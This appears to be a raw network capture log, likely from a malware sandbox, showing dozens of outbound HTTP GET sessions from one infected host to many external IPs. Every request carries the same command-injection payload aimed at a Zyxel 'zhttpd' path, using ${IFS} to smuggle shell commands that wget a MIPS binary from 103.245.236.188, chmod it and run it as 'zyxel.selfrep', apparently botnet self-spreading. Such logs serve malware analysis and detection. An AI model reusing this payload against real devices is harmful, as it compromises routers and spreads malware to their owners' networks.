                                                Jan 12, 2024 18:24:42.020795107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5986192.168.2.134513273.159.103.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.020875931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5987192.168.2.1353956112.112.62.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.020931959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5988192.168.2.13586942.11.234.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.020981073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5989192.168.2.1353916222.177.182.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.021048069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5990192.168.2.1356402101.2.80.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.021138906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5991192.168.2.1335624121.208.136.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.021208048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5992192.168.2.1358418212.18.195.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.021294117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5993192.168.2.1358638140.26.72.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.021368027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5994192.168.2.1340966142.21.238.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.021435022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5995192.168.2.1345798103.152.11.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.021502018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5996192.168.2.1344064187.57.66.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.021580935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5997192.168.2.1337258208.19.183.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.021661997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5998192.168.2.1359346113.39.209.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.021732092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5999192.168.2.1350004135.190.212.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.021790028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6000192.168.2.135310897.136.5.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.021895885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6001192.168.2.1349940106.13.136.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.021951914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6002192.168.2.135662442.12.182.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.022016048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6003192.168.2.1337246154.131.66.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.022108078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6004192.168.2.1351524161.148.205.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.022146940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6005192.168.2.1352152107.249.22.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.022233009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6006192.168.2.135990091.235.212.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.022339106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6007192.168.2.135090059.171.252.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.022432089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6008192.168.2.1347822164.94.232.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.022516012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6009192.168.2.1338658102.172.83.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.022569895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6010192.168.2.133983065.12.109.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.022676945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6011192.168.2.1341870222.207.173.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.022735119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6012192.168.2.134570866.165.15.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.022789955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6013192.168.2.1360472124.220.94.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.022855997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6014192.168.2.134247686.70.24.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.022934914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6015192.168.2.135188013.220.236.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.022996902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6016192.168.2.134896636.150.42.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.023071051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6017192.168.2.1339724169.117.53.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.023139000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6018192.168.2.1343076171.8.84.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.023215055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6019192.168.2.1348376157.131.60.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.023289919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6020192.168.2.1338080204.97.209.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.023344994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6021192.168.2.1342530103.149.74.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.023459911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6022192.168.2.135817286.126.121.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.023530006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6023192.168.2.1353150138.9.89.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.023632050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6024192.168.2.1348946111.250.232.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.023684025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6025192.168.2.1349154146.92.6.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.023753881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6026192.168.2.135826647.81.151.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.023837090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6027192.168.2.133434848.60.211.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.023922920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6028192.168.2.133969043.252.93.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.023997068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6029192.168.2.1334256124.95.27.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.024082899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6030192.168.2.1343178117.165.140.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.024138927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6031192.168.2.133905818.133.50.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.024189949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6032192.168.2.13562721.152.39.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.024288893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6033192.168.2.1343434170.165.5.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.024355888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6034192.168.2.135814460.52.123.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.024436951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6035192.168.2.1345294162.118.81.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.024497986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6036192.168.2.1333060155.227.52.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.024579048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6037192.168.2.135984418.176.78.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.024672985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6038192.168.2.135190812.90.102.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.024733067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6039192.168.2.1356972170.240.154.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.024857998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6040192.168.2.1350516189.245.84.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.024946928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6041192.168.2.1337282130.40.212.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.025007963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6042192.168.2.136018844.235.77.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.025075912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6043192.168.2.134381683.118.64.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.025130033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6044192.168.2.1346116191.106.171.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.025196075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6045192.168.2.135583458.80.144.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.025269032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6046192.168.2.1349108128.221.97.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.025338888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6047192.168.2.1342712181.26.117.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.025425911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6048192.168.2.135836893.53.67.241443
                                                TimestampBytes transferredDirectionData
